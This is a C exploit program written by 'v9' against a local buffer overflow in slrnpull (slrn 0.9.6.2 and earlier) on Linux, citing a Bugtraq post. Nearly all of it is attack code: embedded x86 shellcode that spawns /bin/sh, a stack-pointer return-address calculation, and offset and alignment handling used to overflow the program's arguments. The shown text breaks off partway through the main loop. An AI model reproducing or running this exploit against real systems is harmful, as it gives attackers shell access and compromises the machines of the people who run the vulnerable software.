/* (linux)slrnpull[slrn_v0.9.6.2-] buffer overflow, by v9[v9@fakehalo.org]. i made this after i viewed Michal Zalewski's "rh 6.2 - gid compromises, etc" (posted: Wed Jun 21 2000 06:54:08) text on bugtraq. according to his text slrnpull among other programs is exploitable. so, i downloaded the source and scanned through it to write little exploit for it. note: there didn't appear to be any set*gid() code in the source, execpt mentions of it, so i'm just using generic (non-set*id) shellcode. also, i just plucked one of the ways to overflow this: -d(spooldir) option, NNTPSERVER environment variable, etc. overflow. the main slrn program has many overflows as well. offsets should range from 1200 to 2900. (roughly) */ #define FILENAME "slrnpull" // (which) slrnpull filename to execute. #define BUFFER 2048 // buffer size used to overflow. #define DEFAULT_OFFSET 1750 // default offset, argv option. #define DEFAULT_ALIGN 1 // default align, argv option. static char exec[]= "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56" "\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80" "\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; // still 01. long sp(void){__asm__("movl %esp,%eax");} // where offset is add/sub from. void execute(){ char cmd[256]; snprintf(cmd,256,"`which %s`",FILENAME); system(cmd); } int main(int argc,char **argv){ char bof[BUFFER]; int i,offset,align; long ret; printf("[ slrnpull[slrn_v0.9.6.2-] local buffer overflow, by: v9[v9@fakehalo.o" "rg]. ]\n"); if(argc>1){offset=atoi(argv[1]);} else{offset=DEFAULT_OFFSET;} if(argc>2){ if(atoi(argv[2])>3||atoi(argv[2])<0){ printf("*** invalid alignment value(%s), using internal default: %d. (0-3)\n" ,argv[2],DEFAULT_ALIGN); align=DEFAULT_ALIGN; } else{align=atoi(argv[2]);} } else{align=DEFAULT_ALIGN;} ret=(sp()+offset); printf("[ return address: 0x%lx, offset: %d, address alignment: %d. ]\n" ,ret,offset,align); for(i=align;i